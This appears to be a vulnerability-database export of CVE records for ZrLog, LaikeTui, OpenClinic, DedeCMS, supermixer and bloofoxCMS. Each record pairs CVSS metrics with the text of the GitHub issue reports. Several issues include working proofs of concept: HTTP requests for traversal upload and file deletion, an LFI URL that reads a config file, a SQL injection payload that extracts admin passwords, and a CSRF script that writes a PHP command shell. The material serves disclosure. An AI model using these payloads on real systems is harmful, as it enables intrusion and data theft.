A Cross-site scripting (XSS) vulnerability exists in the comment section in ZrLog 2.1.3, which allows remote attackers to inject arbitrary web script and stolen administrator cookies via the nickname parameter and gain access to the admin panel.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://gist.github.com/T-pod/d9405dbd61243990d65d55c5df0fcbe6" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/94fzb/zrlog/commit/b921c1ae03b8290f438657803eee05226755c941" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/94fzb/zrlog/issues/56" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://gist.github.com/T-pod/d9405dbd61243990d65d55c5df0fcbe6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/94fzb/zrlog/commit/b921c1ae03b8290f438657803eee05226755c941" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/94fzb/zrlog/issues/56" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zrlog:zrlog:2.1.3:*:*:*:*:*:*:*", "matchCriteriaId": "1E79549A-322A-43AB-956A-653C832A9F1A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/94fzb/zrlog/issues/56
[ "Patch", "Third Party Advisory" ]
github.com
[ "94fzb", "zrlog" ]
在2.1.3版本中,前台对文章评论处,可以插入获取管理员cookie的XSS语句,管理员访问登录后台即可触发XSS。 ![image](https://user-images.githubusercontent.com/42511919/67159413-e2e72380-f376-11e9-89c7-6ef0dade1936.png) ![image](https://user-images.githubusercontent.com/42511919/67159399-b7643900-f376-11e9-9d58-eb1ff07386b4.png)
前台文章评论处存储型XSS
https://api.github.com/repos/94fzb/zrlog/issues/56/comments
1
2019-10-20T12:20:37Z
2019-11-27T10:24:39Z
https://github.com/94fzb/zrlog/issues/56
509,587,780
56
2,053
CVE-2021-34128
2021-06-15T20:15:14.117
LaikeTui 3.5.0 allows remote authenticated users to execute arbitrary PHP code by using index.php?module=system&action=pay to upload a ZIP archive containing a .php file, as demonstrated by the ../../../../phpinfo.php pathname.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bettershop/LaikeTui/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bettershop/LaikeTui/issues/8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:laiketui:laiketui:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "B79363F5-5011-491C-B2A9-3AFBBD44F96C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/bettershop/LaikeTui/issues/8
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "bettershop", "LaikeTui" ]
The cause of the vulnerability: When decompressing, the compressed files were not filtered and judged, which resulted in the possibility of uploading cross-directory zip files to getshell. ![image](https://user-images.githubusercontent.com/74132978/120011878-5b14d100-c011-11eb-827d-ea8f36b79e98.png) Vulnerability Recurrence:: Log in to the background and visit:/open/app/LKT/index.php?module=system&action=pay To upload a compressed file, put the malicious file that can be traversed into a zip, upload and decompress it. ![image](https://user-images.githubusercontent.com/74132978/120011896-6405a280-c011-11eb-9def-1c8f2a0081ea.png) ![image](https://user-images.githubusercontent.com/74132978/120011956-71229180-c011-11eb-8f19-e3841c0aa858.png) Then access the path of the malicious file: ![image](https://user-images.githubusercontent.com/74132978/120011992-7d0e5380-c011-11eb-9b53-0cbd87fef515.png) poc: ``` POST /open/app/LKT/index.php?module=system&action=pay HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------22809827021874544672920013866 Content-Length: 959 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/open/app/LKT/index.php?module=system&action=pay Cookie: bdshare_firstime=1609743336438; ECS[visit_times]=4; admin_mojavi=0kbneeltri2qm0ropn901mvb61 Upgrade-Insecure-Requests: 1 -----------------------------22809827021874544672920013866 Content-Disposition: form-data; name="mch_id" 0 -----------------------------22809827021874544672920013866 Content-Disposition: form-data; name="mch_key" 111 -----------------------------22809827021874544672920013866 Content-Disposition: form-data; name="upload_cert"; filename="debug.zip" Content-Type: application/x-zip-compressed //upload file -----------------------------22809827021874544672920013866 Content-Disposition: form-data; name="mch_cert" http://127.0.0.1/open/app/LKT/webapp/lib/cert -----------------------------22809827021874544672920013866 Content-Disposition: form-data; name="Submit" -----------------------------22809827021874544672920013866-- ``` Upload was successful and executed successfully!
Compressed file upload getshell
https://api.github.com/repos/bettershop/LaikeTui/issues/8/comments
1
2021-05-28T16:10:44Z
2021-06-22T11:11:22Z
https://github.com/bettershop/LaikeTui/issues/8
905,673,802
8
2,054
CVE-2021-34129
2021-06-15T20:15:14.147
LaikeTui 3.5.0 allows remote authenticated users to delete arbitrary files, as demonstrated by deleting install.lock in order to reinstall the product in an attacker-controlled manner. This deletion is possible via directory traversal in the uploadImg, oldpic, or imgurl parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 5.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bettershop/LaikeTui/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bettershop/LaikeTui/issues/9" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:laiketui:laiketui:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "B79363F5-5011-491C-B2A9-3AFBBD44F96C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/bettershop/LaikeTui/issues/9
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "bettershop", "LaikeTui" ]
When the system is successfully installed, the system will generate the install.lock file in the /data/ directory. When the user wants to reinstall, it will first determine whether the install.lock file exists. If it exists, the installation cannot be repeated, but we can find one To delete any file, delete the install.lock file, you can directly reinstall the system. The parameters $uploadImg, $oldpic, and $imgurl are all controllable: ![image](https://user-images.githubusercontent.com/74132978/120352658-937b1e80-c333-11eb-9bae-773010889c20.png) Vulnerability recurrence: first log in to the background to access the link : http://your domain /open/app/LKT//index.php?module=Article,and then publish an article. ![image](https://user-images.githubusercontent.com/74132978/120352716-a42b9480-c333-11eb-8bdf-86584809a700.png) Then modify the article: ![image](https://user-images.githubusercontent.com/74132978/120352741-ac83cf80-c333-11eb-88e4-c305bed35cfb.png) Before proceeding with any file deletion, visit the install directory: ![image](https://user-images.githubusercontent.com/74132978/120352781-b73e6480-c333-11eb-9b1f-3c8945d6be42.png) Replace parameters and delete any files: ![image](https://user-images.githubusercontent.com/74132978/120352830-c2919000-c333-11eb-8726-6e68ed6eb2c6.png) ![image](https://user-images.githubusercontent.com/74132978/120352856-cb826180-c333-11eb-8807-21c572cb40fe.png) Visit the install directory again and find that arbitrary file deletion has been implemented, which leads to reinstallation vulnerabilities. ![image](https://user-images.githubusercontent.com/74132978/120352897-d3da9c80-c333-11eb-803d-89975b7ee678.png) ``` POST /open/app/LKT//index.php?module=Article&action=modify HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------344640124212804469902957501276 Content-Length: 1265 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/open/app/LKT//index.php?module=Article&action=modify&id=2&uploadImg=../LKT/images/ Cookie: bdshare_firstime=1609743336438; ECS[visit_times]=4; admin_mojavi=79kjqjkl1ntgk4q7se7maqtdcl Upgrade-Insecure-Requests: 1 -----------------------------344640124212804469902957501276 Content-Disposition: form-data; name="id" 2 -----------------------------344640124212804469902957501276 Content-Disposition: form-data; name="editable" true -----------------------------344640124212804469902957501276 Content-Disposition: form-data; name="uploadImg" ../../ -----------------------------344640124212804469902957501276 Content-Disposition: form-data; name="Article_title" 222 -----------------------------344640124212804469902957501276 Content-Disposition: form-data; name="Article_prompt" 111 -----------------------------344640124212804469902957501276 Content-Disposition: form-data; name="sort" 100 -----------------------------344640124212804469902957501276 Content-Disposition: form-data; name="imgurl" ../../111 -----------------------------344640124212804469902957501276 Content-Disposition: form-data; name="oldpic" app/data/install.lock -----------------------------344640124212804469902957501276 Content-Disposition: form-data; name="Submit" -----------------------------344640124212804469902957501276 Content-Disposition: form-data; name="content" <p>32333<br/></p> -----------------------------344640124212804469902957501276-- ```
Arbitrary file deletion leads to system reinstallation vulnerabilities
https://api.github.com/repos/bettershop/LaikeTui/issues/9/comments
1
2021-06-01T15:55:50Z
2021-06-22T11:11:47Z
https://github.com/bettershop/LaikeTui/issues/9
908,450,418
9
2,055
CVE-2020-20444
2021-06-16T16:15:07.787
Jact OpenClinic 0.8.20160412 allows the attacker to read server files after login to the the admin account by an infected 'file' GET parameter in '/shared/view_source.php' which "could" lead to RCE vulnerability .
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/23.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jact/openclinic/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/23.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jact/openclinic/issues/8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openclinic_project:openclinic:0.8.20160412:*:*:*:*:*:*:*", "matchCriteriaId": "BF835C51-8A05-42F8-A24B-3B5E8749A1DD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "862" ]
862
https://github.com/jact/openclinic/issues/8
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jact", "openclinic" ]
PoC : http://localhost/openClinic/shared/view_source.php?file=../config/database_constants.php Impact : Anyone login to the the admin account can read files from server like config and maybe can [get RCE](https://resources.infosecinstitute.com/local-file-inclusion-code-execution/#gref). Fix : remove the view_source.php or you can blacklist the dot and slashes . Hitman ALHarbi | Blackfoxs Team .
LFI on OpenClinic Admin
https://api.github.com/repos/jact/openclinic/issues/8/comments
0
2019-09-15T01:19:29Z
2019-09-17T18:37:22Z
https://github.com/jact/openclinic/issues/8
493,683,141
8
2,056
CVE-2020-22198
2021-06-16T16:15:07.823
SQL Injection vulnerability in DedeCMS 5.7 via mdescription parameter to member/ajax_membergroup.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://www.hackdig.com/?02/hack-8391.htm" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blindkey/DedeCMSv5/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://www.hackdig.com/?02/hack-8391.htm" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blindkey/DedeCMSv5/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dedecms:dedecms:5.7:-:*:*:*:*:*:*", "matchCriteriaId": "787DA248-344B-42CB-95C4-D664BCE46208", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/blindkey/DedeCMSv5/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "blindkey", "DedeCMSv5" ]
https://github.com/dedetech/DedeCMSv5/blob/master/src/member/ajax_membergroup.php ![image](https://user-images.githubusercontent.com/703783/74638329-ac93a680-51a6-11ea-8016-e8268172138b.png) line 53 indicate that we can control mdescription variables . because there is no fillter fro var mdescription. so we can acheive a sql injection in that . like poc: GET /ccpAdvert/member/ajax_membergroup.php?action=despost&mdescription=1',`description`%3D@`'`,`description`%3D(select%20concat(pwd,0x23416e6f6e796d6f757323,userid)%20from%20dede_admin)%23 HTTP/1.1%0d%0aHost: x.x.x.x%0d%0aUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; rv 11.0) like Gecko%0d%0aContent-Type: %0d%0a%0d%0a
ajax_membergroup.php mdescription SQL inject
https://api.github.com/repos/blindkey/DedeCMSv5/issues/1/comments
0
2020-02-17T09:01:25Z
2020-02-17T09:01:25Z
https://github.com/blindkey/DedeCMSv5/issues/1
566,151,280
1
2,057
CVE-2020-24939
2021-06-16T16:15:07.860
Prototype pollution in Stampit supermixer 1.0.3 allows an attacker to modify the prototype of a base object which can vary in severity depending on the implementation.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/1321.html" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/stampit-org/supermixer/compare/v1.0.4...v1.0.5" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/stampit-org/supermixer/issues/9" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://hackerone.com/reports/959987" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/1321.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/stampit-org/supermixer/compare/v1.0.4...v1.0.5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/stampit-org/supermixer/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://hackerone.com/reports/959987" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:stampit:supermixer:1.0.3:*:*:*:*:*:*:*", "matchCriteriaId": "D3601BFB-1BC9-4856-9059-810024761873", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1321" ]
1321
https://github.com/stampit-org/supermixer/issues/9
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "stampit-org", "supermixer" ]
I would like to report a Prototype pollution in supermixer, It allows an attacker to modify the prototype of a base object which can vary in severity depending on the implementation. # Vulnerability Description: Prototype Pollution is a vulnerability affecting JavaScript, Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. # Proof of Concept: ```javascript var mixer = require('supermixer'); var payload = '{"__proto__":{"poc":"evil"}}'; var test = {}; console.log("Before: ", test.poc); mixer.merge({},JSON.parse(payload)); console.log("After: ", test.poc); ``` # Impact : DoS, Access to restricted data, RCE (depends on implementation)
Prototype pollution
https://api.github.com/repos/stampit-org/supermixer/issues/9/comments
1
2020-08-20T02:43:31Z
2020-08-20T03:44:54Z
https://github.com/stampit-org/supermixer/issues/9
682,331,920
9
2,058
CVE-2020-35759
2021-06-16T16:15:07.933
bloofoxCMS 0.5.2.1 is infected with a CSRF Attack that leads to an attacker editing any file content (Locally/Remotely).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/alexlang24/bloofoxCMS/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/alexlang24/bloofoxCMS/issues/10" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "C12BED64-DA1B-4FB8-A196-B414759D79C4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/alexlang24/bloofoxCMS/issues/10
[ "Exploit", "Third Party Advisory" ]
github.com
[ "alexlang24", "bloofoxCMS" ]
I discovered a CSRF Vulnerability in `bloofoxCMS/admin/index.php?mode=settings&page=editor`, the request validation was not there to avoid CSRF Attacks. ## PoC :- ```javascript <script> var bloofox = new XMLHttpRequest(); bloofox.onreadystatechange = function() { if (this.readyState == 4) { alert('Done'); } }; bloofox.open("POST", "http://localhost/bloofoxCMS/admin/index.php?mode=settings&page=editor", true); bloofox.withCredentials = true; bloofox.send('file=%3C%3F%3D%60%24_GET%5B1%5D%60%3B&backlink=&fileurl=config.php&send=Save'); </script> ``` ## Impact Change any file content in webserver (Locally/Remotely) ## Fix [Synchronizer Token Pattern](https://medium.com/@jude.niroshan11/what-is-csrf-synchronizer-token-pattern-3b244791ab4b)
CSRF Attack that leads to edit any file content (Locally/Remotely)
https://api.github.com/repos/alexlang24/bloofoxCMS/issues/10/comments
0
2020-12-27T11:02:09Z
2020-12-27T11:02:09Z
https://github.com/alexlang24/bloofoxCMS/issues/10
775,017,504
10
2,059
CVE-2020-35760
2021-06-16T16:15:07.963
bloofoxCMS 0.5.2.1 is infected with Unrestricted File Upload that allows attackers to upload malicious files (ex: php files).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/alexlang24/bloofoxCMS/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/alexlang24/bloofoxCMS/issues/9" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "C12BED64-DA1B-4FB8-A196-B414759D79C4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/alexlang24/bloofoxCMS/issues/9
[ "Exploit", "Third Party Advisory" ]
github.com
[ "alexlang24", "bloofoxCMS" ]
